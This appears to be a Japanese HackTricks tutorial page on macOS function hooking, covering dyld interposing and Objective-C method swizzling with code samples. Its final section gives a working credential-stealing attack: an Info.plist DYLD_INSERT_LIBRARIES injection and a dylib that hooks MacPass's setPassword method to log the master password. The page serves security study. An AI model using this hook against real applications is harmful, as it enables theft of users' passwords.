macOS Function Hooking

htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学ぶ

HackTricksをサポートする他の方法:

関数インターポージング

__interpose (__DATA___interpose) セクション(または S_INTERPOSING フラグが付いたセクション)を含む 関数ポインタ のタプルを持つ dylib を作成し、元の関数と置換関数を参照します。

その後、DYLD_INSERT_LIBRARIES でdylibをインジェクトします(インターポージングはメインアプリがロードされる前に発生する必要があります)。明らかに、DYLD_INSERT_LIBRARIES の使用に適用される制限事項もここに適用されます

printfをインターポース

interpose.c
// gcc -dynamiclib interpose.c -o interpose.dylib
#include <stdio.h>
#include <stdarg.h>

int my_printf(const char *format, ...) {
//va_list args;
//va_start(args, format);
//int ret = vprintf(format, args);
//va_end(args);

int ret = printf("Hello from interpose\n");
return ret;
}

__attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf
__attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf };
DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello
Hello from interpose

DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello
Hello from interpose

DYLD_PRINT_INTERPOSTING 環境変数は、インターポージングのデバッグに使用でき、インターポースプロセスを出力します。

また、インターポージングはプロセスとロードされたライブラリの間で発生することに注意してください。共有ライブラリキャッシュでは機能しません。

ダイナミックインターポージング

今では、dyld_dynamic_interpose 関数を使用して、関数を動的にインターポースすることも可能です。これにより、ランタイムで関数をプログラム的にインターポースすることができ、最初からのみ行うのではなくなります。

置き換える関数と置き換える関数のタプルを指定するだけです。

struct dyld_interpose_tuple {
const void* replacement;
const void* replacee;
};
extern void dyld_dynamic_interpose(const struct mach_header* mh,
const struct dyld_interpose_tuple array[], size_t count);

メソッドスイズリング

ObjectiveCでは、メソッドは次のように呼び出されます: [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]

オブジェクトメソッドパラメータが必要です。メソッドが呼び出されると、objc_msgSend 関数を使用して msg が送信されます: int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);

オブジェクトは someObject、メソッドは @selector(method1p1:p2:) で、引数は value1value2 です。

オブジェクト構造に従って、メソッドの 名前メソッドコードへのポインタ格納されている メソッドの配列 にアクセスすることができます。

メソッドやクラスは名前に基づいてアクセスされるため、この情報はバイナリに保存されているため、otool -ov </path/bin> または class-dump </path/bin> を使用して取得することが可能です。

生のメソッドにアクセスする

次の例のように、メソッドの情報(名前、パラメータ数、アドレスなど)にアクセスすることができます:

// gcc -framework Foundation test.m -o test

#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>

int main() {
// Get class of the variable
NSString* str = @"This is an example";
Class strClass = [str class];
NSLog(@"str's Class name: %s", class_getName(strClass));

// Get parent class of a class
Class strSuper = class_getSuperclass(strClass);
NSLog(@"Superclass name: %@",NSStringFromClass(strSuper));

// Get information about a method
SEL sel = @selector(length);
NSLog(@"Selector name: %@", NSStringFromSelector(sel));
Method m = class_getInstanceMethod(strClass,sel);
NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m));
NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m));

// Iterate through the class hierarchy
NSLog(@"Listing methods:");
Class currentClass = strClass;
while (currentClass != NULL) {
unsigned int inheritedMethodCount = 0;
Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount);

NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount);

for (unsigned int i = 0; i < inheritedMethodCount; i++) {
Method method = inheritedMethods[i];
SEL selector = method_getName(method);
const char* methodName = sel_getName(selector);
unsigned long address = (unsigned long)method_getImplementation(m);
NSLog(@"Inherited method name: %s (0x%lx)", methodName, address);
}

// Free the memory allocated by class_copyMethodList
free(inheritedMethods);
currentClass = class_getSuperclass(currentClass);
}

// Other ways to call uppercaseString method
if([str respondsToSelector:@selector(uppercaseString)]) {
NSString *uppercaseString = [str performSelector:@selector(uppercaseString)];
NSLog(@"Uppercase string: %@", uppercaseString);
}

// Using objc_msgSend directly
NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString));
NSLog(@"Uppercase string: %@", uppercaseString2);

// Calling the address directly
IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address
NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp
NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method
NSLog(@"Uppercase string: %@", uppercaseString3);

return 0;
}

method_exchangeImplementationsを使用したメソッドのスイズリング

関数**method_exchangeImplementations**は、1つの関数の実装のアドレスを他の関数に変更することを可能にします。

したがって、関数が呼び出されると実行されるのは他の関数です。

//gcc -framework Foundation swizzle_str.m -o swizzle_str

#import <Foundation/Foundation.h>
#import <objc/runtime.h>


// Create a new category for NSString with the method to execute
@interface NSString (SwizzleString)

- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;

@end

@implementation NSString (SwizzleString)

- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");

// Call the original method
return [self swizzledSubstringFromIndex:from];
}

@end

int main(int argc, const char * argv[]) {
// Perform method swizzling
Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:));
Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:));
method_exchangeImplementations(originalMethod, swizzledMethod);

// We changed the address of one method for the other
// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex
// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled

// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);

return 0;
}

この場合、正規メソッドの実装コードメソッド 検証すると、このスイズリングを検出して実行を防ぐことができます。

次のテクニックにはこの制限がありません。

method_setImplementationを使用したメソッドスイズリング

前の形式は奇妙です。なぜなら、2つのメソッドの実装を変更しているからです。method_setImplementation 関数を使用すると、1つのメソッドの実装を他のメソッドに変更できます。

新しい実装から呼び出す場合は、元の実装のアドレスを保存しておくことを忘れないでください。後でそのアドレスを見つけるのが複雑になるためです。

#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>

static IMP original_substringFromIndex = NULL;

@interface NSString (Swizzlestring)

- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;

@end

@implementation NSString (Swizzlestring)

- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");

// Call the original implementation using objc_msgSendSuper
return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from);
}

@end

int main(int argc, const char * argv[]) {
@autoreleasepool {
// Get the class of the target method
Class stringClass = [NSString class];

// Get the swizzled and original methods
Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:));

// Get the function pointer to the swizzled method's implementation
IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:)));

// Swap the implementations
// It return the now overwritten implementation of the original method to store it
original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP);

// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);

// Set the original implementation back
method_setImplementation(originalMethod, original_substringFromIndex);

return 0;
}
}

フック攻撃方法論

このページでは、関数をフックするさまざまな方法について説明されています。ただし、これらはプロセス内でコードを実行して攻撃するというものでした。

そのためには、最も簡単な技術としては、Dyldを環境変数またはハイジャックを介して注入することができます。ただし、Dylibプロセスインジェクションを介して行うこともできると思われます。

ただし、これらのオプションは保護されていないバイナリ/プロセスに限定されています。制限事項について詳しく知るには、各技術を確認してください。

ただし、関数フック攻撃は非常に特定されたものであり、攻撃者はこれを行ってプロセス内の機密情報を盗み出すために行います(そうでなければプロセスインジェクション攻撃を行うでしょう)。そして、この機密情報はMacPassなどのユーザーがダウンロードしたアプリケーションに存在する可能性があります。

したがって、攻撃者の手法は、脆弱性を見つけるか、アプリケーションの署名を削除し、Info.plistを介して**DYLD_INSERT_LIBRARIES**環境変数を注入することです。例えば、次のように追加します:

<key>LSEnvironment</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/Applications/Application.app/Contents/malicious.dylib</string>
</dict>

そしてアプリケーションを再登録してください:

/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app

そのライブラリに、情報を外部に送信するフックコードを追加します:パスワード、メッセージ...

新しいバージョンの macOS では、アプリケーションバイナリの署名を削除した場合、それが以前に実行されていた場合、macOS はもはやそのアプリケーションを実行しなくなります。

ライブラリの例

// gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib

// If you added env vars in the Info.plist don't forget to call lsregister as explained before

// Listen to the logs with something like:
// log stream --style syslog --predicate 'eventMessage CONTAINS[c] "Password"'

#include <Foundation/Foundation.h>
#import <objc/runtime.h>

// Here will be stored the real method (setPassword in this case) address
static IMP real_setPassword = NULL;

static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL)
{
// Function that will log the password and call the original setPassword(pass, file_path) method
NSLog(@"[+] Password is: %@", password);

// After logging the password call the original method so nothing breaks.
return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd,  password, keyFileURL);
}

// Library constructor to execute
__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
// Get the real method address to not lose it
Class classMPDocument = NSClassFromString(@"MPDocument");
Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:));

// Make the original method setPassword call the fake implementation one
IMP fake_IMP = (IMP)custom_setPassword;
real_setPassword = method_setImplementation(real_Method, fake_IMP);
}

参考

htARTE(HackTricks AWS Red Team Expert) を通じてゼロからヒーローまでAWSハッキングを学ぶ

HackTricks をサポートする他の方法:

Last updated